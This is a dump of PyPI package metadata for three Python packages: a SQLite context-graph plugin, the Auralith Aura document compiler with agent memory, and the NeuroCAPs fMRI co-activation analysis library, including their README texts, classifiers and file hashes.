metadata_version
string
name
string
version
string
summary
string
description
string
description_content_type
string
author
string
author_email
string
maintainer
string
maintainer_email
string
license
string
keywords
string
classifiers
list
platform
list
home_page
string
download_url
string
requires_python
string
requires
list
provides
list
obsoletes
list
requires_dist
list
provides_dist
list
obsoletes_dist
list
requires_external
list
project_urls
list
uploaded_via
string
upload_time
timestamp[us]
filename
string
size
int64
path
string
python_version
string
packagetype
string
comment_text
string
has_signature
bool
md5_digest
string
sha256_digest
string
blake2_256_digest
string
license_expression
string
license_files
list
recent_7d_downloads
int64
2.2
cjm-graph-plugin-sqlite
0.0.4
A local, file-backed Context Graph worker for the cjm-plugin-system that implements graph storage, traversal, and querying using SQLite.
# cjm-graph-plugin-sqlite

<!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! -->

## Install

``` bash
pip install cjm_graph_plugin_sqlite
```

## Project Structure

    nbs/
    ├── meta.ipynb    # Metadata introspection for the SQLite Graph plugin used by cjm-ctl to generate the registration manifest.
    └── plugin.ipynb  # Plugin implementation for Context Graph using SQLite

Total: 2 notebooks

## Module Dependencies

``` mermaid
graph LR
    meta[meta<br/>Metadata]
    plugin[plugin<br/>SQLite Graph Plugin]

    plugin --> meta
```

*1 cross-module dependency detected*

## CLI Reference

No CLI commands found in this project.

## Module Overview

Detailed documentation for each module in the project:

### Metadata (`meta.ipynb`)

> Metadata introspection for the SQLite Graph plugin used by cjm-ctl to
> generate the registration manifest.

#### Import

``` python
from cjm_graph_plugin_sqlite.meta import (
    get_plugin_metadata
)
```

#### Functions

``` python
def get_plugin_metadata() -> Dict[str, Any]:  # Plugin metadata for manifest generation
    "Return metadata required to register this plugin with the PluginManager."
```

### SQLite Graph Plugin (`plugin.ipynb`)

> Plugin implementation for Context Graph using SQLite

#### Import

``` python
from cjm_graph_plugin_sqlite.plugin import (
    SQLiteGraphPluginConfig,
    SQLiteGraphPlugin
)
```

#### Classes

``` python
@dataclass
class SQLiteGraphPluginConfig:
    "Configuration for SQLite Graph Plugin."

    db_path: Optional[str] = field(...)
    readonly: bool = field(...)
```

``` python
class SQLiteGraphPlugin:
    "Local, file-backed Context Graph implementation using SQLite."

    def __init__(self):
        self.logger = logging.getLogger(f"{__name__}.{type(self).__name__}")
        self.config: SQLiteGraphPluginConfig = None

    def name(self) -> str:  # Plugin name identifier
        "Get the plugin name identifier."

    @property
    def version(self) -> str:  # Plugin version string
        "Get the plugin version string."

    def get_current_config(self) -> Dict[str, Any]:  # Current configuration as dictionary
        "Return current configuration state."

    def get_config_schema(self) -> Dict[str, Any]:  # JSON Schema for configuration
        "Return JSON Schema for UI generation."

    def initialize(
        self,
        config: Optional[Any] = None  # Configuration dataclass, dict, or None
    ) -> None:
        "Initialize DB connection and schema."

    def execute(
        self,
        action: str = "get_schema",  # Action to perform
        **kwargs
    ) -> Dict[str, Any]:  # JSON-serializable result
        "Dispatch to appropriate method based on action."

    def add_nodes(
        self,
        nodes: List[GraphNode]  # Nodes to create
    ) -> List[str]:  # Created node IDs
        "Bulk create nodes."

    def add_edges(
        self,
        edges: List[GraphEdge]  # Edges to create
    ) -> List[str]:  # Created edge IDs
        "Bulk create edges."

    def get_node(
        self,
        node_id: str  # UUID of node to retrieve
    ) -> Optional[GraphNode]:  # Node or None if not found
        "Get a single node by ID."

    def get_edge(
        self,
        edge_id: str  # UUID of edge to retrieve
    ) -> Optional[GraphEdge]:  # Edge or None if not found
        "Get a single edge by ID."

    def find_nodes_by_source(
        self,
        source_ref: SourceRef  # External resource reference
    ) -> List[GraphNode]:  # Nodes attached to this source
        "Find all nodes linked to a specific external resource."

    def find_nodes_by_label(
        self,
        label: str,  # Node label to search for
        limit: int = 100  # Max results
    ) -> List[GraphNode]:  # Matching nodes
        "Find nodes by label."

    def get_context(
        self,
        node_id: str,  # Starting node UUID
        depth: int = 1,  # Traversal depth (1 = immediate neighbors)
        filter_labels: Optional[List[str]] = None  # Only include nodes with these labels
    ) -> GraphContext:  # Subgraph containing node and its neighborhood
        "Get the neighborhood of a specific node."

    def update_node(
        self,
        node_id: str,  # UUID of node to update
        properties: Dict[str, Any]  # Properties to merge/update
    ) -> bool:  # True if successful
        "Partial update of node properties."

    def update_edge(
        self,
        edge_id: str,  # UUID of edge to update
        properties: Dict[str, Any]  # Properties to merge/update
    ) -> bool:  # True if successful
        "Partial update of edge properties."

    def delete_nodes(
        self,
        node_ids: List[str],  # UUIDs of nodes to delete
        cascade: bool = True  # Also delete connected edges
    ) -> int:  # Number of nodes deleted
        "Delete nodes (and optionally connected edges)."

    def delete_edges(
        self,
        edge_ids: List[str]  # UUIDs of edges to delete
    ) -> int:  # Number of edges deleted
        "Delete edges."

    def get_schema(self) -> Dict[str, Any]:  # Graph schema/ontology
        "Return the current ontology/schema of the graph."

    def import_graph(
        self,
        graph_data: GraphContext,  # Data to import
        merge_strategy: str = "overwrite"  # "overwrite", "skip", or "merge"
    ) -> Dict[str, int]:  # Import statistics {nodes_created, edges_created, ...}
        "Bulk import a GraphContext (e.g., from backup or another plugin)."

    def export_graph(
        self,
        filter_query: Optional[GraphQuery] = None  # Optional filter
    ) -> GraphContext:  # Exported subgraph or full graph
        "Export the entire graph or a filtered subset."

    def cleanup(self) -> None:
        "Clean up resources."
```
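The method surface above maps naturally onto a small relational schema. The following is a self-contained sketch of the storage pattern such a plugin might use: nodes keyed by UUID strings with JSON-encoded properties, plus an edges table referencing them. This is hypothetical and simplified, not the package's actual schema, and the real `GraphNode`/`GraphEdge` types from cjm-plugin-system are replaced by plain dicts here.

``` python
import json
import sqlite3
import uuid

def make_store(db_path=":memory:"):
    # Hypothetical minimal schema: nodes keyed by UUID, edges referencing them.
    conn = sqlite3.connect(db_path)
    conn.executescript("""
        CREATE TABLE IF NOT EXISTS nodes (
            id         TEXT PRIMARY KEY,
            label      TEXT NOT NULL,
            properties TEXT NOT NULL DEFAULT '{}'
        );
        CREATE TABLE IF NOT EXISTS edges (
            id         TEXT PRIMARY KEY,
            source_id  TEXT NOT NULL REFERENCES nodes(id),
            target_id  TEXT NOT NULL REFERENCES nodes(id),
            edge_type  TEXT NOT NULL,
            properties TEXT NOT NULL DEFAULT '{}'
        );
    """)
    return conn

def add_node(conn, label, properties=None):
    # Mirrors the add_nodes/get_node contract: UUID string IDs, JSON properties.
    node_id = str(uuid.uuid4())
    conn.execute(
        "INSERT INTO nodes (id, label, properties) VALUES (?, ?, ?)",
        (node_id, label, json.dumps(properties or {})),
    )
    return node_id

def find_nodes_by_label(conn, label, limit=100):
    # Parameterized query, as a readonly-safe plugin would issue it.
    rows = conn.execute(
        "SELECT id, label, properties FROM nodes WHERE label = ? LIMIT ?",
        (label, limit),
    ).fetchall()
    return [{"id": i, "label": lb, "properties": json.loads(p)} for i, lb, p in rows]

conn = make_store()
node_id = add_node(conn, "Person", {"name": "Ada"})
matches = find_nodes_by_label(conn, "Person")
print(matches[0]["properties"]["name"])  # Ada
```

Storing properties as a JSON text column keeps the table schema stable while node payloads vary, which is the usual trade-off for a generic graph store on SQLite.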
text/markdown
Christian J. Mills
9126128+cj-mills@users.noreply.github.com
null
null
Apache Software License 2.0
nbdev jupyter notebook python
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Natural Language :: English", "Programming Language :: Python :: 3.12", "License :: OSI Approved :: Apache Software License" ]
[]
https://github.com/cj-mills/cjm-graph-plugin-sqlite
null
>=3.12
[]
[]
[]
[ "cjm_graph_plugin_system" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:34:09.330990
cjm_graph_plugin_sqlite-0.0.4.tar.gz
17,063
7a/6d/db5d34b476736d3fd6fc0344a6b009120b18d7ad6a502c423a2848de2d45/cjm_graph_plugin_sqlite-0.0.4.tar.gz
source
sdist
null
false
c10305db84f1554382dbbeafa6c7e2ab
fdc72ec6fa17d349126c9d8ece02708cadd56db096cfe06ba3d467a097eb40be
7a6ddb5d34b476736d3fd6fc0344a6b009120b18d7ad6a502c423a2848de2d45
null
[]
247
2.4
auralith-aura
0.2.2
The Universal Context Compiler for AI Agent Memory
<p align="center"> <img src="logo.png" alt="Auralith Logo" width="120"> <h1 align="center">Aura: The Universal Context Compiler</h1> <p align="center"> <strong>Compile any document into AI-ready knowledge bases with built-in agent memory.</strong> </p> </p> <p align="center"> <a href="https://pypi.org/project/auralith-aura/"><img src="https://badge.fury.io/py/auralith-aura.svg" alt="PyPI version"></a> <a href="https://github.com/Auralith-Inc/aura-core#-license"><img src="https://img.shields.io/badge/License-Apache_2.0_+_Proprietary-blue.svg" alt="License"></a> <a href="https://www.python.org/downloads/"><img src="https://img.shields.io/badge/python-3.8+-blue.svg" alt="Python 3.8+"></a> <a href="https://github.com/Auralith-Inc/aura-core"><img src="https://img.shields.io/badge/platform-macOS%20%7C%20Windows%20%7C%20Linux-lightgrey" alt="Platform"></a> </p> <p align="center"> <a href="#-quick-start">Quick Start</a> • <a href="#-agent-memory">Agent Memory</a> • <a href="#-agent-integrations">Integrations</a> • <a href="#-rag-support">RAG Support</a> • <a href="https://aura.auralith.org">Website</a> </p> --- ## Context is the new Compute. Aura compiles messy, real-world files (PDFs, DOCX, HTML, code, spreadsheets — **60+ formats**) into a single optimized binary (`.aura`) ready for **RAG retrieval** and **AI agent memory**. One command. No JSONL scripting. No parsing pipelines. ```bash pip install auralith-aura aura compile ./my_data/ --output knowledge.aura ``` --- ## ⚡ Quick Start ### 1. Install ```bash pip install auralith-aura # For full document support (PDFs, DOCX, etc.) pip install 'aura-core[all]' ``` ### 2. Compile ```bash # Basic compilation aura compile ./company_data/ --output knowledge.aura # With PII masking (emails, phones, SSNs automatically redacted) aura compile ./data/ --output knowledge.aura --pii-mask # Filter low-quality content aura compile ./data/ --output knowledge.aura --min-quality 0.3 ``` ### 3. 
Use **For RAG (Knowledge Retrieval):** ```python from aura.rag import AuraRAGLoader loader = AuraRAGLoader("knowledge.aura") text = loader.get_text_by_id("doc_001") # Framework wrappers langchain_docs = loader.to_langchain_documents() llama_docs = loader.to_llama_index_documents() ``` **For Agent Memory:** ```python from aura.memory import AuraMemoryOS memory = AuraMemoryOS() # Write to memory tiers memory.write("fact", "User prefers dark mode", source="agent") memory.write("episodic", "Discussed deployment strategy") memory.write("pad", "TODO: check auth module") # Search memory results = memory.query("user preferences") # End session (flushes to durable shards) memory.end_session() ``` --- ## 🧠 Agent Memory Aura includes a **3-Tier Memory OS** — a persistent memory architecture for AI agents: | Tier | Purpose | Lifecycle | |------|---------|-----------| | `/pad` | Working notes, scratch space | Transient | | `/episodic` | Session transcripts, conversation history | Auto-archived | | `/fact` | Verified facts, user preferences | Persistent | The Memory OS is **included free** when you install from PyPI (`pip install auralith-aura`). 
```bash # CLI memory management aura memory list # View all memory shards aura memory usage # Storage usage by tier aura memory prune --before 2026-01-01 # Clean up old memories ``` --- ## 🤖 Agent Integrations Aura works natively with the major AI agent platforms: | Platform | Repo | Use Case | |----------|------|----------| | **OpenClaw** | [`aura-openclaw`](https://github.com/Auralith-Inc/aura-openclaw) | Persistent RAG + memory for always-on agents | | **Claude Code** | [`aura-claude-code`](https://github.com/Auralith-Inc/aura-claude-code) | Context-aware coding with `/aura` commands | | **OpenAI Codex** | [`aura-codex`](https://github.com/Auralith-Inc/aura-codex) | Knowledge-backed Codex agents | | **Gemini CLI** | [`aura-gemini-cli`](https://github.com/Auralith-Inc/aura-gemini-cli) | Gemini CLI extension for RAG | ### How It Works (Agent RAG Flow) ``` You: "Learn everything in my /docs/ folder" → Agent runs: aura compile ./docs/ --output knowledge.aura → Agent loads: AuraRAGLoader("knowledge.aura") → You: "What does the auth module do?" → Agent queries the .aura file and responds with cited answers ``` --- ## 🌟 Key Features | Feature | Description | |---------|-------------| | **Universal Ingestion** | Parses 60+ formats: PDF, DOCX, HTML, MD, CSV, code, and more | | **Agent Memory OS** | 3-tier memory (pad/episodic/fact) with instant writes | | **PII Masking** | Automatically redacts emails, phones, SSNs before compilation | | **Instant RAG** | Query any document by keyword or ID. LangChain + LlamaIndex wrappers | | **Quality Filtering** | Skip low-quality content with configurable thresholds | | **Cross-Platform** | macOS, Windows, and Linux | | **Secure by Design** | No pickle. No arbitrary code execution. Safe to share. 
| --- ## 📁 Supported File Formats <details> <summary><b>Documents</b> - PDF, DOCX, HTML, and more</summary> - `.pdf`, `.docx`, `.doc`, `.rtf`, `.odt`, `.epub`, `.txt`, `.pages`, `.wpd` - `.html`, `.htm`, `.xml` - `.eml`, `.msg` (emails) - `.pptx`, `.ppt` (presentations) </details> <details> <summary><b>Data</b> - Spreadsheets and structured data</summary> - `.csv`, `.tsv` - `.xlsx`, `.xls` - `.parquet` - `.json`, `.jsonl` - `.yaml`, `.yml`, `.toml` </details> <details> <summary><b>Code</b> - All major programming languages</summary> - **Python**: `.py`, `.pyi`, `.ipynb` - **Web**: `.js`, `.ts`, `.jsx`, `.tsx`, `.css` - **Systems**: `.c`, `.cpp`, `.h`, `.hpp`, `.rs`, `.go`, `.java`, `.kt`, `.swift` - **Scripts**: `.sh`, `.bash`, `.zsh`, `.ps1`, `.bat` - **Backend**: `.sql`, `.php`, `.rb`, `.cs`, `.scala` - **Config**: `.ini`, `.cfg`, `.conf`, `.env`, `.dockerfile` </details> <details> <summary><b>Markup</b> - Documentation formats</summary> - `.md` (Markdown) - `.rst` (reStructuredText) - `.tex`, `.latex` </details> --- ## 🔧 CLI Reference ```bash aura compile <input_directory> --output <file.aura> [options] Options: --pii-mask Mask PII (emails, phones, SSNs) --min-quality SCORE Filter low-quality content (0.0-1.0) --domain DOMAIN Tag with domain context --no-recursive Don't search subdirectories --verbose, -v Verbose output ``` ### Memory Management ```bash aura memory list # List all memory shards aura memory usage # Show storage by tier aura memory prune --before 2026-01-01 # Remove old shards aura memory prune --id <shard_id> # Remove specific shard ``` ### Inspect an Archive ```bash aura info knowledge.aura 📦 Aura Archive: knowledge.aura Datapoints: 1,234 Sample datapoint: Tensors: ['raw_text'] Source: legal/contract_001.pdf ``` --- ## 🔌 RAG Support ```python from aura.rag import AuraRAGLoader loader = AuraRAGLoader("knowledge.aura") # Text retrieval text = loader.get_text_by_id("doc_001") # Filter documents pdf_docs = loader.filter_by_extension(".pdf") 
legal_docs = loader.filter_by_source("legal/") # Framework wrappers langchain_docs = loader.to_langchain_documents() # LangChain llama_docs = loader.to_llama_index_documents() # LlamaIndex dict_list = loader.to_dict_list() # Universal # Statistics stats = loader.get_stats() ``` --- ## 📐 File Format Specification The `.aura` format is a secure, indexed binary archive: ``` [Datapoint 1][Datapoint 2]...[Datapoint N][Index][Footer] Each Datapoint: [meta_length: 4 bytes, uint32] [tensor_length: 4 bytes, uint32] [metadata: msgpack bytes] [tensors: safetensors bytes] Footer: [index_offset: 8 bytes, uint64] [magic: 4 bytes, 'AURA'] ``` **Security**: Uses `safetensors` (not pickle) — safe to load untrusted files. --- ## 💻 Runs Locally Aura compiles entirely on your local machine — no cloud uploads, no external APIs, no telemetry. - **Runs on your local hardware** — any modern laptop or desktop, your setup, your choice - **Fully offline** — zero internet required after install - **Cross-platform** — macOS, Windows, Linux - **Python 3.8+** Your documents never leave your hardware. --- ## 🚀 Scale Up with OMNI Aura handles local compilation. For enterprise-scale training pipelines, model fine-tuning, and production-grade agent infrastructure — there's **OMNI**. - Cloud-scale data compilation & training pipelines - Supervised model fine-tuning with emphasis weighting - Production agent memory infrastructure - Team collaboration & enterprise compliance **[Explore OMNI →](https://omni.auralith.org)** --- ## 📜 License - **Compiler, RAG, Loader, Binary Format**: [Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0) - **Memory OS**: Proprietary — free to use, included in PyPI package. See [LICENSE-MEMORY](https://github.com/Auralith-Inc/aura-core/blob/main/LICENSE-MEMORY). 
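The footer layout in the specification above can be exercised in a few lines of `struct`. This is a minimal illustration of the described byte layout, not the library's actual reader; the spec does not state byte order, so little-endian is assumed here.

``` python
import struct

MAGIC = b"AURA"

def append_footer(buf, index_offset):
    # Footer per the spec: uint64 index offset, then the 4-byte 'AURA' magic.
    buf += struct.pack("<Q", index_offset) + MAGIC

def read_index_offset(data):
    # Validate the trailing magic, then recover where the index section begins.
    if data[-4:] != MAGIC:
        raise ValueError("not an .aura archive")
    (index_offset,) = struct.unpack("<Q", data[-12:-4])
    return index_offset

archive = bytearray(b"\x00" * 128)  # stand-in for datapoint + index bytes
append_footer(archive, index_offset=100)
print(read_index_offset(bytes(archive)))  # 100
```

Because the magic and offset sit at the end of the file, a reader can seek straight to the last 12 bytes and jump to the index without scanning the datapoints.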
--- ## 🔗 Links - **Website**: [aura.auralith.org](https://aura.auralith.org) - **PyPI**: [pypi.org/project/auralith-aura](https://pypi.org/project/auralith-aura) - **GitHub**: [github.com/Auralith-Inc/aura-core](https://github.com/Auralith-Inc/aura-core) - **OpenClaw Skill**: [github.com/Auralith-Inc/aura-openclaw](https://github.com/Auralith-Inc/aura-openclaw) --- <p align="center"> Made with ❤️ by <a href="https://auralith.org">Auralith Inc.</a> </p>
text/markdown
Auralith Inc.
"Auralith Inc." <info@auralith.org>
null
null
Apache-2.0 AND Proprietary
ai, agent-memory, rag, retrieval-augmented-generation, context-compiler, openclaw, claude-code, codex, gemini-cli, llm, knowledge-base
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Pyth...
[]
https://github.com/Auralith-Inc/aura-core
null
>=3.8
[]
[]
[]
[ "numpy>=1.21.0", "msgpack>=1.0.0", "safetensors>=0.3.0", "tqdm>=4.60.0", "unstructured>=0.10.0; extra == \"docs\"", "pypdf>=3.0.0; extra == \"docs\"", "python-docx>=0.8.11; extra == \"docs\"", "pandas>=1.3.0; extra == \"data\"", "openpyxl>=3.0.0; extra == \"data\"", "pyarrow>=10.0.0; extra == \"da...
[]
[]
[]
[ "Homepage, https://aura.auralith.org", "Documentation, https://github.com/Auralith-Inc/aura-core#readme", "Repository, https://github.com/Auralith-Inc/aura-core.git", "Issues, https://github.com/Auralith-Inc/aura-core/issues", "Changelog, https://github.com/Auralith-Inc/aura-core/releases" ]
twine/6.2.0 CPython/3.10.0
2026-02-19T22:33:55.191494
auralith_aura-0.2.2.tar.gz
50,822
61/4e/a00d1d6752e8904fbe4d1667c5beb1b0f17538511d3cad321d05ca3a1f27/auralith_aura-0.2.2.tar.gz
source
sdist
null
false
3e4ee3e0ae90f3d8cc162079ee90b91b
3fe3d814a750b75c3b17b8079e0bb72a3dc59eb82a0543bb7d3dc7dea5e30b17
614ea00d1d6752e8904fbe4d1667c5beb1b0f17538511d3cad321d05ca3a1f27
null
[ "LICENSE", "LICENSE-MEMORY" ]
240
2.4
neurocaps
0.37.2
Co-activation Patterns (CAPs) Python package
# NeuroCAPs: Neuroimaging Co-Activation Patterns [![Latest Version](https://img.shields.io/pypi/v/neurocaps.svg)](https://pypi.python.org/pypi/neurocaps/) [![Python Versions](https://img.shields.io/pypi/pyversions/neurocaps.svg)](https://pypi.python.org/pypi/neurocaps/) [![DOI](https://img.shields.io/badge/DOI-10.5281%2Fzenodo.11642615-teal)](https://doi.org/10.5281/zenodo.18529846) [![Test Status](https://github.com/donishadsmith/neurocaps/actions/workflows/testing.yaml/badge.svg)](https://github.com/donishadsmith/neurocaps/actions/workflows/testing.yaml) [![Documentation Status](https://readthedocs.org/projects/neurocaps/badge/?version=stable)](http://neurocaps.readthedocs.io/en/stable/?badge=stable) [![codecov](https://codecov.io/github/donishadsmith/neurocaps/branch/main/graph/badge.svg?token=WS2V7I16WF)](https://codecov.io/github/donishadsmith/neurocaps) [![Docker](https://img.shields.io/badge/Docker-donishadsmith/neurocaps-darkblue.svg?logo=docker)](https://hub.docker.com/r/donishadsmith/neurocaps/tags/) [![JOSS](https://joss.theoj.org/papers/0e5c44d5d82402fa0f28e6a8833428f0/status.svg)](https://joss.theoj.org/papers/0e5c44d5d82402fa0f28e6a8833428f0) NeuroCAPs (**Neuro**imaging **C**o-**A**ctivation **P**attern**s**) is a Python package for performing Co-Activation Patterns (CAPs) analyses on resting-state or task-based fMRI data. CAPs identifies recurring brain states by applying k-means clustering on BOLD timeseries data [^1]. <p align="center"> <img src="docs/assets/workflow.png" width="400" height="700"> </p> ## Installation **Requires Python 3.9-3.14.** ### Standard Installation ```bash pip install neurocaps ``` **Windows Users**: Enable [long paths](https://learn.microsoft.com/en-us/windows/win32/fileio/maximum-file-path-limitation?tabs=powershell) and use: ```bash pip install neurocaps[windows] ``` ### Development Version ```bash git clone --depth 1 https://github.com/donishadsmith/neurocaps/ cd neurocaps pip install -e . 
# For Windows # pip install -e .[windows] # Clone with submodules to include test data ~140 MB git submodule update --init ``` ## Docker A [Docker](https://docs.docker.com/) image is available with demos and headless VTK display configured: ```bash # Pull image docker pull donishadsmith/neurocaps && docker tag donishadsmith/neurocaps neurocaps # Run interactive bash docker run -it neurocaps # Run Jupyter Notebook docker run -it -p 9999:9999 neurocaps notebook ``` ## Features NeuroCAPs is built around two main classes (`TimeseriesExtractor` and `CAP`) and includes several features to perform the complete CAPs workflow from postprocessing to visualizations. Notable features include: | Component | Key Features | | -------- | ------------| | **Timeseries Extraction (`TimeseriesExtractor`)** | <ul><li>supports Schaefer, AAL, and deterministic custom parcellations</li><li>performs nuisance regression and motion scrubbing</li><li>reports quality control based on framewise displacement<br><br><b>Important</b>: Optimized for BIDS-compliant data preprocessed with <a href="https://fmriprep.org/en/stable/">fMRIPrep</a> and assumes data is BIDS compliant. 
Refer to <a href="https://neurocaps.readthedocs.io/en/stable/bids.html">NeuroCAPs' BIDS Structure and Entities Documentation</a> for additional information.</li></ul> | | **CAPs Analysis (`CAP`)** | <ul><li>performs k-means clustering</li><li>finds the optimal number of clusters (silhouette, elbow, variance ratio, Davies-Bouldin)</li><li>computes temporal dynamic metrics (temporal fraction, persistence, counts, transition frequency and probabilities) [^2] [^3]</li><li>converts CAPs to NIfTI images</li><li>creates visualizations (heatmaps, outer products, surface plots, correlation matrices, cosine similarity radar plots [^4] [^5]).</li></ul> | | **Standalone Functions** | <ul><li>plots transition matrices</li><li>merges timeseries data across tasks or sessions [^6]</li><li>generates and fetches custom parcellation approaches</li></ul> | Full details for every function and parameter are available in the [API Documentation](https://neurocaps.readthedocs.io/en/stable/api.html). ## Quick Start The following code demonstrates basic usage of NeuroCAPs (with simulated data) to perform CAPs analysis. A version of this example using real data from [OpenNeuro](https://openneuro.org/) is available on the [readthedocs](https://neurocaps.readthedocs.io/en/stable/tutorials/tutorial-8.html). Additional [tutorials](https://neurocaps.readthedocs.io/en/stable/tutorials/) and [interactive demonstrations](https://github.com/donishadsmith/neurocaps/tree/main/demos) are also available. 1. 
Extract timeseries data ```python import numpy as np from neurocaps.extraction import TimeseriesExtractor from neurocaps.utils import simulate_bids_dataset # Set seed np.random.seed(0) # Generate a BIDS directory with fMRIPrep derivatives bids_root = simulate_bids_dataset(n_subs=3, n_runs=1, n_volumes=100, task_name="rest") # Using Schaefer, one of the default parcellation approaches parcel_approach = {"Schaefer": {"n_rois": 100, "yeo_networks": 7}} # List of fMRIPrep-derived confounds for nuisance regression acompcor_names = [f"a_comp_cor_0{i}" for i in range(5)] confound_names = ["cosine*", "trans*", "rot*", *acompcor_names] # Initialize extractor with signal cleaning parameters extractor = TimeseriesExtractor( space="MNI152NLin2009cAsym", parcel_approach=parcel_approach, confound_names=confound_names, standardize=False, # Run discarded if more than 30% of volumes exceed FD threshold fd_threshold={"threshold": 0.90, "outlier_percentage": 0.30}, ) # Extract preprocessed BOLD data extractor.get_bold(bids_dir=bids_root, task="rest", tr=2, n_cores=1, verbose=False) # Check QC information qc_df = extractor.report_qc() print(qc_df) ``` ![Quality Control Dataframe.](paper/qc_df.png) 2. Use k-means clustering to identify the optimal number of CAPs from the data using a heuristic ```python from neurocaps.analysis import CAP from neurocaps.utils import PlotDefaults # Initialize CAP class cap_analysis = CAP(parcel_approach=extractor.parcel_approach, groups=None) plot_kwargs = {**PlotDefaults.get_caps(), "figsize": (4, 3), "step": 2} # Find optimal CAPs (2-20) using silhouette method; results are stored cap_analysis.get_caps( subject_timeseries=extractor.subject_timeseries, n_clusters=range(2, 21), standardize=True, cluster_selection_method="silhouette", max_iter=500, n_init=10, show_figs=True, **plot_kwargs, ) ``` <img src="paper/silhouette_plot.png" alt="Silhouette Score Plot." style="width:46%; height:auto;"> 3. 
Compute temporal dynamic metrics for downstream statistical analyses ```python # Calculate temporal fraction of each CAP metric_dict = cap_analysis.calculate_metrics( extractor.subject_timeseries, metrics=["temporal_fraction"] ) print(metric_dict["temporal_fraction"]) ``` ![Temporal Fraction Dataframe.](paper/temporal_fraction_df.png) Note that CAP-1 is the dominant brain state across subjects (highest frequency). 4. Visualize CAPs ```python # Create surface and radar plots for each CAP surface_kwargs = {**PlotDefaults.caps2surf(), "layout": "row", "size": (500, 100)} radar_kwargs = {**PlotDefaults.caps2radar(), "height": 400, "width": 485} radar_kwargs["radialaxis"] = {"range": [0, 0.4], "tickvals": [0.1, "", "", 0.4]} radar_kwargs["legend"] = {"yanchor": "top", "y": 0.75, "x": 1.15} cap_analysis.caps2surf(**surface_kwargs).caps2radar(**radar_kwargs) ``` <img src="paper/cap_1_surface.png" alt="CAP-1 Surface Image." style="width:46%; height:auto;"> <img src="paper/cap_2_surface.png" alt="CAP-2 Surface Image." style="width:46%; height:auto;"> <img src="paper/cap_1_radar.png" alt="CAP-1 Radar Image." style="width:46%; height:auto;"> <img src="paper/cap_2_radar.png" alt="CAP-2 Radar Image." style="width:46%; height:auto;"> Radar plots show network alignment (measured by cosine similarity): "High Amplitude" represents alignment to activations (> 0), "Low Amplitude" represents alignment to deactivations (< 0). Each CAP can be characterized using either maximum alignment (CAP-1: Vis+/SomMot-; CAP-2: SomMot+/Vis-) or predominant alignment ("High Amplitude" − "Low Amplitude"; CAP-1: SalVentAttn+/SomMot-; CAP-2: SomMot+/SalVentAttn-). 
```python import pandas as pd for cap_name in cap_analysis.caps["All Subjects"]: df = pd.DataFrame(cap_analysis.cosine_similarity["All Subjects"][cap_name]) df["Net"] = df["High Amplitude"] - df["Low Amplitude"] df["Regions"] = cap_analysis.cosine_similarity["All Subjects"]["Regions"] print(f"{cap_name}:", "\n", df, "\n") ``` CAP-1: <img src="paper/cap_1_alignment_df.png" alt="CAP-1 Network Alignment Dataframe." style="width:46%; height:auto;"> CAP-2: <img src="paper/cap_2_alignment_df.png" alt="CAP-2 Network Alignment Dataframe." style="width:46%; height:auto;"> **Note**: For information about logging, refer to [NeuroCAPs' Logging Guide](https://neurocaps.readthedocs.io/en/stable/user_guide/logging.html). ## Citing If you would like to cite NeuroCAPs, you can use: ``` Smith, D., (2025). NeuroCAPs: A Python Package for Performing Co-Activation Patterns Analyses on Resting-State and Task-Based fMRI Data. Journal of Open Source Software, 10(112), 8196, https://doi.org/10.21105/joss.08196 ``` ## Reporting Issues Bug reports, feature requests, and documentation enhancements can be reported using the templates offered when creating a new issue in the [issue tracker](https://github.com/donishadsmith/neurocaps/issues). ## Contributing Please refer the [contributing guidelines](https://neurocaps.readthedocs.io/en/stable/contributing.html) on how to contribute to NeuroCAPs. ## Acknowledgements NeuroCAPs relies on several popular data processing, machine learning, neuroimaging, and visualization [packages](https://neurocaps.readthedocs.io/en/stable/#dependencies). Additionally, some foundational concepts in this package take inspiration from features or design patterns implemented in other neuroimaging Python packages, specifically: - mtorabi59's [pydfc](https://github.com/neurodatascience/dFC), a toolbox that allows comparisons among several popular dynamic functionality methods. 
- 62442katieb's [IDConn](https://github.com/62442katieb/IDConn), a pipeline for assessing individual differences in resting-state or task-based functional connectivity. ## References [^1]: Liu, X., Chang, C., & Duyn, J. H. (2013). Decomposition of spontaneous brain activity into distinct fMRI co-activation patterns. Frontiers in Systems Neuroscience, 7. https://doi.org/10.3389/fnsys.2013.00101 [^2]: Liu, X., Zhang, N., Chang, C., & Duyn, J. H. (2018). Co-activation patterns in resting-state fMRI signals. NeuroImage, 180, 485–494. https://doi.org/10.1016/j.neuroimage.2018.01.041 [^3]: Yang, H., Zhang, H., Di, X., Wang, S., Meng, C., Tian, L., & Biswal, B. (2021). Reproducible coactivation patterns of functional brain networks reveal the aberrant dynamic state transition in schizophrenia. NeuroImage, 237, 118193. https://doi.org/10.1016/j.neuroimage.2021.118193 [^4]: Zhang, R., Yan, W., Manza, P., Shokri-Kojori, E., Demiral, S. B., Schwandt, M., Vines, L., Sotelo, D., Tomasi, D., Giddens, N. T., Wang, G., Diazgranados, N., Momenan, R., & Volkow, N. D. (2023). Disrupted brain state dynamics in opioid and alcohol use disorder: attenuation by nicotine use. Neuropsychopharmacology, 49(5), 876–884. https://doi.org/10.1038/s41386-023-01750-w [^5]: Ingwersen, T., Mayer, C., Petersen, M., Frey, B. M., Fiehler, J., Hanning, U., Kühn, S., Gallinat, J., Twerenbold, R., Gerloff, C., Cheng, B., Thomalla, G., & Schlemm, E. (2024). Functional MRI brain state occupancy in the presence of cerebral small vessel disease — A pre-registered replication analysis of the Hamburg City Health Study. Imaging Neuroscience, 2, 1–17. https://doi.org/10.1162/imag_a_00122 [^6]: Kupis, L., Romero, C., Dirks, B., Hoang, S., Parladé, M. V., Beaumont, A. L., Cardona, S. M., Alessandri, M., Chang, C., Nomi, J. S., & Uddin, L. Q. (2020). Evoked and intrinsic brain network dynamics in children with autism spectrum disorder. NeuroImage: Clinical, 28, 102396. https://doi.org/10.1016/j.nicl.2020.102396
text/markdown
null
Donisha Smith <donishasmith@outlook.com>
null
null
null
python, Co-Activation Patterns, CAPs, neuroimaging, fmri, dfc, dynamic functional connectivity, fMRIPrep
